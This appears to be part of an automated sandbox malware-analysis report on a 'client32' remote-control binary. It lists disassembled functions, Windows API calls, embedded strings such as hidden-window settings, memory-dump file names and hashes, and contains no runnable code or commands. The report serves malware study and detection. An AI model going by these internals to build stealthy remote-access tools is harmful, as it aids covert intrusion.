                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                                                                    • SetCaretPos.USER32(?,?), ref: 11025111
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ObjectSelect$CaretExtentPoint32ReleaseText
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4100900918-3916222277
                                                                                                                                                    • Opcode ID: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                                                                                    • Instruction ID: b0707e50622e5a2dee3f64ca7938c426cfa52823b6f102614556d1b444951bd6
                                                                                                                                                    • Opcode Fuzzy Hash: 81849d76d252f21a55fd605d5a4a08d2267cf51cac1b4e435e9d7ec204cef2ae
                                                                                                                                                    • Instruction Fuzzy Hash: 84414C71A41318AFEB10DFA4CD84FAEBBF8EF89700F118169F915AB244DB749900CB60
                                                                                                                                                    Function 1101F0D0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 116windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1101F0FE
                                                                                                                                                    • SystemParametersInfoA.USER32(00000029,00000000,?,00000000), ref: 1101F11D
                                                                                                                                                      • Part of subcall function 110CCE60: GetWindowRect.USER32(110CEFF5,?), ref: 110CCE7C
                                                                                                                                                      • Part of subcall function 110CCE60: SetRectEmpty.USER32(?), ref: 110CCE88
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101F16C
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 1101F178
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 1101F187
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 1101F19F
                                                                                                                                                    • GetMenuItemCount.USER32 ref: 1101F1A7
                                                                                                                                                    • _memset.LIBCMT ref: 1101F1CF
                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1101F20C
                                                                                                                                                    • __strdup.LIBCMT ref: 1101F221
                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 1101F279
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoItemMenu$CreateDeleteFontIndirectObjectRect_memset$CountEmptyParametersSystemWindow__strdup
                                                                                                                                                    • String ID: 0$MakeOwnerDraw
                                                                                                                                                    • API String ID: 1249465458-1190305232
                                                                                                                                                    • Opcode ID: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                                                                                    • Instruction ID: cad075490b8b101532292c9a84c7126ab9bfd0db94d612dc2b0baac2de7b47d0
                                                                                                                                                    • Opcode Fuzzy Hash: c1d057d4b376d33391db275f0bf70fb86bac35c6ea87d071bec4acea8677cd57
                                                                                                                                                    • Instruction Fuzzy Hash: 19417E71D012399BDB64DFA4CC89BD9FBB8BB09708F0001D9E508A7284DBB46A84CF94
                                                                                                                                                    Function 1112B9B0 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                    • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                                                                    • API String ID: 2449869053-2279908372
                                                                                                                                                    • Opcode ID: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                                                                                                    • Instruction ID: 1bba0573f20789ca060975004b1edadb32616992e73bf794dbb13e42fcf3a639
                                                                                                                                                    • Opcode Fuzzy Hash: cea9448887420246af282f77f4e5a4ecce69bf7a034b252f213f846cda0e5cbe
                                                                                                                                                    • Instruction Fuzzy Hash: 5231B371B11228ABEB249F758C55FEEF7B8EF8A315F104199FA09A7280DA705D408F94
                                                                                                                                                    Function 1102370A Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 363windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 1115BAE0: IsIconic.USER32(?), ref: 1115BB87
                                                                                                                                                      • Part of subcall function 1115BAE0: ShowWindow.USER32(?,00000009), ref: 1115BB97
                                                                                                                                                      • Part of subcall function 1115BAE0: BringWindowToTop.USER32(?), ref: 1115BBA1
                                                                                                                                                    • CheckMenuItem.USER32(00000000,000013EB,-00000009), ref: 1102384D
                                                                                                                                                    • ShowWindow.USER32(?,00000003), ref: 110238D1
                                                                                                                                                    • LoadMenuA.USER32(00000000,000013A3), ref: 110239FB
                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 11023A09
                                                                                                                                                    • CheckMenuItem.USER32(00000000,000013EB,?), ref: 11023A29
                                                                                                                                                    • GetDlgItem.USER32(?,000013B2), ref: 11023A3C
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 11023A43
                                                                                                                                                    • PostMessageA.USER32(?,00000111,?,00000000), ref: 11023A99
                                                                                                                                                    • DestroyMenu.USER32(?,?,00000000,00000000,00000102,?,?,?,00000000), ref: 11023AA3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Window$Item$CheckShow$BringDestroyIconicLoadMessagePostRect
                                                                                                                                                    • String ID: AddToJournal$Chat
                                                                                                                                                    • API String ID: 693070851-2976406578
                                                                                                                                                    • Opcode ID: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                                                                                    • Instruction ID: 808c1e48a155f27d2b3c0586fadc3707d2cf985dccefb9094def5a9ab05a8e38
                                                                                                                                                    • Opcode Fuzzy Hash: 4e8affa197535ad0660103244a90f227890d3a0ada2779ccdef05f8d718aa204
                                                                                                                                                    • Instruction Fuzzy Hash: 58A10334F44616ABDB08CF64CC85FAEB3E9AB8C704F50452DE6569F6C0DBB4A900CB95
                                                                                                                                                    Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                                                      • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                      • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                                                                                    • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                    • API String ID: 2014016395-1677429133
                                                                                                                                                    • Opcode ID: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                                                                                                    • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                                                                                                    • Opcode Fuzzy Hash: f40b352dcf41bf990ef8532e9d61be92d2988391912dd2b6e0b8644578a58059
                                                                                                                                                    • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                                                                                                    Function 11131320 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 187COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,11139C95,00000000), ref: 11131428
                                                                                                                                                    • ShowWindow.USER32(00000000,00000000,?,11139C95,00000000), ref: 11131457
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastShowWindow
                                                                                                                                                    • String ID: #32770$Client$Hidden$StatusMode$UI.CPP$gUI.hidden_window
                                                                                                                                                    • API String ID: 3252650109-4091810678
                                                                                                                                                    • Opcode ID: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                                                                                                    • Instruction ID: 1b40a51cdbaebc86ba70b46d463032212dc909346aab7ab50ce078dfded898e8
                                                                                                                                                    • Opcode Fuzzy Hash: 0ae299210a7d0d5a262dbccdfbf7f866bd70b7d9559bf6e9f26038e806d2e655
                                                                                                                                                    • Instruction Fuzzy Hash: 2161D571B84325ABE711CF90CC85F69F774E784B29F104129F625AB2C4EBB56940CB84
                                                                                                                                                    Function 110F7300 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 137libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(Wtsapi32.dll,1EF76653,1102E747,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110F732D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WTSQuerySessionInformationA), ref: 110F7372
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73C3
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F73D8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,WTSFreeMemory), ref: 110F73FD
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7412
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF), ref: 110F7423
                                                                                                                                                    • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7440
                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,11189DD0,000000FF,?,1102A280), ref: 110F7451
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressErrorLastLibraryProc$Free$Load
                                                                                                                                                    • String ID: WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll
                                                                                                                                                    • API String ID: 2188719708-2019804778
                                                                                                                                                    • Opcode ID: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                                                                    • Instruction ID: 4e6ae02227e90de241cbe6e1e3770e4d50810e342ffe13a4e1f679076b39a632
                                                                                                                                                    • Opcode Fuzzy Hash: 8f9cdb94902dff30692c8c6071e3b83f8d748f677524ce08c30458c8737fae8d
                                                                                                                                                    • Instruction Fuzzy Hash: 49511371D4121AEFDB14DFD9D9C5AAEFBF5FB48300F51846AE829E3600DB34A9018B61
                                                                                                                                                    Function 1103F520 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 126windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                                                                                      • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                                                                                      • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                                                                                      • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                                                                                    • GetDlgItem.USER32(?,00000472), ref: 1103F557
                                                                                                                                                      • Part of subcall function 11160450: SetPropA.USER32(00000000,00000000,00000000), ref: 1116046E
                                                                                                                                                      • Part of subcall function 11160450: SetWindowLongA.USER32(00000000,000000FC,1115FE60), ref: 1116047F
                                                                                                                                                    • wsprintfA.USER32 ref: 1103F5D1
                                                                                                                                                    • GetSystemMenu.USER32(?,00000000), ref: 1103F5F6
                                                                                                                                                    • EnableMenuItem.USER32(00000000,0000F060,00000002), ref: 1103F604
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000001,00000000,00000000,00000000,00000000,00000003), ref: 1103F663
                                                                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1103F692
                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 1103F696
                                                                                                                                                      • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                                                                                      • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
